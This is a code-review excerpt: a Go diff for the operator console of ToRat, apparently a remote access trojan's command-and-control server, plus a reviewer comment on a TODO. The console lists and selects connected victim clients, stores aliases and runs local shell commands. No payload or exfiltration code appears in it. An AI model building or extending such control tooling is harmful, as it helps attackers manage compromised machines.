torat_server/server_ishell.go

```diff
@@ -0,0 +1,158 @@
+		panic(err)
+	}
+	shell.SetPrompt(green("[Server] ") + blue(cwd) + "$ ")
+
+	// SELECT CLIENT
+	shell.AddCmd(&ishell.Cmd{
+		Name: "select",
+		Func: func(c *ishell.Context) {
+			if len(activeClients) == 0 {
+				fmt.Println(green("[Server] ") + red("[!] No clients to select!"))
+				return
+			}
+			choice := c.MultiChoice(listConn(), "Select client to interact with:")
+			client := getClient(choice)
+			client.shellClient()
+		},
+		Help: "interact with a client",
+	})
+
+	// LIST CLIENTS
+	shell.AddCmd(&ishell.Cmd{
+		Name: "list",
+		Func: func(c *ishell.Context) {
+			if len(activeClients) == 0 {
+				fmt.Println(green("[Server] ") + red("[!] No clients connected yet!"))
+				return
+			}
+			printClients()
+		},
+		Help: "list all connected clients",
+	})
+
+	// SET ALIAS
+	shell.AddCmd(&ishell.Cmd{
+		Name: "alias",
+		Func: func(c *ishell.Context) {
+			if len(activeClients) == 0 {
+				fmt.Println(green("[Server] ") + red("[!] No clients connected yet!"))
+				return
+			}
+			choice := c.MultiChoice(listConn(), "Select client to give an alias:")
+			fmt.Println(green("Type an alias for selected client:"))
+			name := c.ReadLine()
+			client := activeClients[choice]
+
+			// ISSUE #173
+			client.Client.Name = name
+			db.Save(&client.Client)
+
+		},
+		Help: "give a client an alias",
+	})
+
+	// CHANGE DIRECTORY
+	shell.AddCmd(&ishell.Cmd{
+		Name: "cd",
+		Func: func(c *ishell.Context) {
+
+			path := strings.Join(c.Args, " ")
+			err := os.Chdir(path)
+
+			if err != nil {
+				fmt.Println(green("[Server] ") + red("[!] Cannot navigate to that path!"))
+				fmt.Println(green("[Server] ") + red("[!] ", err))
+			}
+			cwd, _ := os.Getwd()
+			shell.SetPrompt(green("[Server] ") + blue(cwd) + "$ ")
+
+		},
+		Help: "change the working directory of the server",
+	})
+
+	// EXIT THE SERVER
+	shell.AddCmd(&ishell.Cmd{
+		Name: "exit",
+		Func: func(c *ishell.Context) {
+			fmt.Println(green("[Server] ") + red("Exiting Now!"))
+			c.Stop()
+		},
+		Help: "exit the server",
+	})
+
+	shell.NotFound(runCommand)
+
+	shell.Run()
+}
+
+// SERVER SIDE SHELL COMMAND
+func runCommand(c *ishell.Context) {
+	var osshell string
+	var osshellargs []string
+	command := strings.Join(c.Args, " ")
+
+	if runtime.GOOS == "linux" {
+		osshell = "/bin/sh"
+		osshellargs = []string{"-c", command}
+	} else if runtime.GOOS == "windows" {
+		osshell = "cmd"
+		osshellargs = []string{"/C", command}
+	} else if runtime.GOOS == "darwin" {
+		osshell = "/bin/sh"
+		osshellargs = []string{"-c", command}
+	}
+
+	execcmd := exec.Command(osshell, osshellargs...)
+	cmdout, err := execcmd.Output()
+
+	if err != nil {
+		c.Println(green("[Server] ") + red("[!] Bad or unknown command!"))
+		c.Println(green("[Server] ") + red("[!] ", err))
+		return
+	} else if cmdout == nil {
+		c.Println(green("[Server] ") + "No output returned by command!")
+		return
+	} else {
+		c.Println(string(cmdout))
+	}
+}
+
+// GET HOSTNAME OF CLIENT
+// TODO: Is this used? Where?
```

Comment:
Yes here https://github.com/lu4p/ToRat/blob/78547ef9fc7bd55991e7163fc385376955270356/torat_server/server.go#L82, remove the todo.